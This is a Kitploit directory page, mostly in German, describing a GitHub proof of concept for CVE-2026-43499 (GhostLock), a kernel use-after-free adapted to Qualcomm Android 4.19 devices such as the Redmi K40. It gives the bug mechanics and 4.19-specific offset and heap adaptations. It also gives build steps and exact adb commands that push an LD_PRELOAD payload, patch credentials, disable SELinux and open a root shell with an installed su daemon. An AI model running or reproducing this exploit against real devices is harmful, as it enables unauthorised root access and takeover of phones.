Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ghostlock-cve-2026-43499-4.19-k40 — CVE-2026-43499 (GhostLock) rtmutex remove_waiter() UAF Local-Root-PoC, angepasst für Qualcomm-Android-4.19-Kernel (Redmi K40 / Snapdragon-870-Klasse), basierend auf LD_PRELOAD | Kitploit
Tools/GitHubGitHub/yijiacloud/ghostlock-cve-2026-43499-4.19-k40
Android-SicherheitPrivilege EscalationExploitationPost-ExploitationMobile SicherheitPayload-EntwicklungBinary-Exploitation
GitHubyijiacloud/ghostlock-cve-2026-43499-4.19-k40

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ghostlock-cve-2026-43499-4.19-k40

CVE-2026-43499 (GhostLock) rtmutex remove_waiter() UAF Local-Root-PoC, angepasst für Qualcomm-Android-4.19-Kernel (Redmi K40 / Snapdragon-870-Klasse), basierend auf LD_PRELOAD

Repository anzeigen
11vor 8 TagenNoch nicht geprüft

GhostLock — CVE-2026-43499 PoC (Qualcomm 4.19 kernel)

Lokale Rechteausweitung durch Ausnutzung von CVE-2026-43499 — ein remove_waiter()-Bug in rtmutex, der eine struct rt_mutex_waiter auf dem Kernel-Stack des Waiters zurücklässt (kernel/locking/rtmutex.c, CWE-416 Use-after-Free). Adaptiert von NebuSec/CyberMeowfia (IonStack/CVE-2026-43499, Apache-2.0) für eine Qualcomm-Android-4.19.x- Vendor-Kernel-Familie.

  • Kernel: 4.19.157-perf-g9607d8651312 (qcom, clang 10.0.7, SMP PREEMPT, aarch64)
  • Geräteklasse: Snapdragon 870 (sm8250-ac) / Redmi-K40-Klasse-Boards, Android-13-Ära- Builds mit Boot-Header v3
  • Bug: futex_requeue()-Proxy-Lock-Rollback ruft remove_waiter() auf, das mit current statt waiter->task arbeitet — RB-Baum-Dequeue ohne pi_lock, hängendes pi_blocked_on, was zu einem UAF auf dem Kernel-Stack führt. Betroffen bis einschließlich der behobenen Versionen 5.10/5.15/6.1/6.6/6.12/6.18/7.0; 4.19 hat keinen Backport (EOL), daher ist 4.19.157-perf betroffen.

What's in the repo

root@kitploit:~
src/                         adapted exploit sources (preload.so)
src/targets/oplus-4.19.157-perf/target.h   per-device offset table (kallsyms-derived)
prebuilt/                    compiled artifacts (aarch64)
adaptation-4.19.patch        full diff vs. the upstream Pixel (6.x) code
Makefile, build.sh           build entry points

Round-2-Anpassungen für den 4.19-Kernel (vs. 6.x-Upstream)

  • configfs_read_file / configfs_write_bin_file sind in den .read/.write- fops-Slots platziert (4.19-Signaturen), und die Lese-Primitive verwendet das vereinfachte count/page/ppos=0-Fake-Buffer-Layout
  • Das ashmem-Namenspräfix (/dev/ashmem) fehlt auf diesem Kernel — Präfixlänge 0
  • kmalloc-Geometrie: 4.19 hat 3 Cache-Typen (NORMAL/RECLAIM/DMA, keine Per-memcg- Caches); das Legacy-Pipe-Buffer-Array mit 16 Slots landet in kmalloc-1024
  • selinux_blob_sizes existiert auf 4.19 nicht → direkter cred->security (SELINUX_CRED_BLOB_OFF=0); struct seccomp hat kein filter_count
  • ASHMEM_MISC_FOPS = miscdevice.fops-Slot (ashmem_misc + 0x10)

Erstellen

Linux / WSL mit Android-NDK:

root@kitploit:~
export NDK_ROOT=/path/to/android-ndk-r27c
./build.sh                      # or: make PROJECT=oplus-4.19.157-perf

Ausgaben: prebuilt/preload.so (LD_PRELOAD-Payload) und ein eingebettetes su_daemon-PIE.

ADB-Nutzung (Einmal-Root)

Erfordert eine ADB-Shell (eine normale, nicht privilegierte adb shell reicht aus — der Exploit läuft vollständig ohne Privilegien und führt selbst die Eskalation durch).

root@kitploit:~
# 1. push the payload
adb push prebuilt/preload.so /data/local/tmp/

# 2. run the exploit against any command (here: id) via LD_PRELOAD
adb shell LD_PRELOAD=/data/local/tmp/preload.so id

# expected on success: uid=0(root) gid=0(root) groups=...
# on failure the process exits 1 and the log below tells you where it stopped.

Optionale Einzeiler-Varianten:

root@kitploit:~
# capture the exit status too
adb shell "LD_PRELOAD=/data/local/tmp/preload.so id; echo rc=\$?"

# interactive root shell (the exploit also installs an su daemon)
adb shell "LD_PRELOAD=/data/local/tmp/preload.so /system/bin/sh -c 'su -c id'"

Debug-Log (übersteht Panic/Reboot)

Jede pr_*-Zeile wird mit sofortigem write()+fsync() auf den Datenträger gespiegelt, sodass die Spur einen Kernel-Panic/Reboot übersteht:

root@kitploit:~
/sdcard/Download/log_<timestamp>.txt

Fallback-Pfade, falls /sdcard nicht verfügbar ist: /sdcard/Downloads, /data/local/tmp/log_<timestamp>.txt.

root@kitploit:~
# after the run (even after a reboot):
adb shell "ls -t /sdcard/Download/log_*.txt | head -1"
adb shell "cat $(adb shell 'ls -t /sdcard/Download/log_*.txt | head -1' | tr -d '\r')"

Wichtige Log-Markierungen:

  • preload starting pid=... log=/sdcard/Download/log_<ts>.txt — Payload geladen
  • slide-kaslr-ok ... base=... — KASLR-Basis wiederhergestellt
  • pipe-physrw-summary ... root=1 ... — phys RW installiert
  • uid_before=... uid_after=0 ... selinux=1->0 — Credentials gepatcht
  • auf 4.19 gibt das Slide-Gadget vor seinem ersten Versuch UNVERIFIED aus — diese Stufe muss pro Gerät mithilfe dieses Logs angepasst werden.

Hinweise & Einschränkungen

  • Die erste Stufe (KASLR-Slide-Leak) ist pro Gerät abgestimmt; Werte, die für 4.19 nicht statisch abgeleitet werden konnten, sind in target.h markiert und werden zur Laufzeit als UNVERIFIED protokolliert. Iteriere auf dem Gerät mit dem fsync-Log.
  • CONFIG_STATIC_USERMODEHELPER=y deaktiviert in diesem Build Modprobe-Pfad-Tricks; der primäre Pfad ist das direkte Patchen von cred.
  • Verifiziere die Korrektheit der Offsets für deinen exakten Build über die kallsyms des Kernels (/proc/kallsyms) und /proc/slabinfo vor der Bereitstellung.

Lizenz

Apache-2.0 (Upstream: NebuSec/CyberMeowfia). Nur für Sicherheitsforschung und autorisiertes Rooten eigener Geräte. Verwende es nur auf Hardware, die dir gehört.

Tool herunterladen
  • Die Struct-Offsets (task_struct / cred / pipe_inode_info / file_operations / mm_struct / struct page / configfs_buffer) wurden aus den kallsyms und eingebetteten ikheaders dieses Kernels neu abgeleitet und gegen die eigene RELA-Relokationstabelle des Kernels validiert.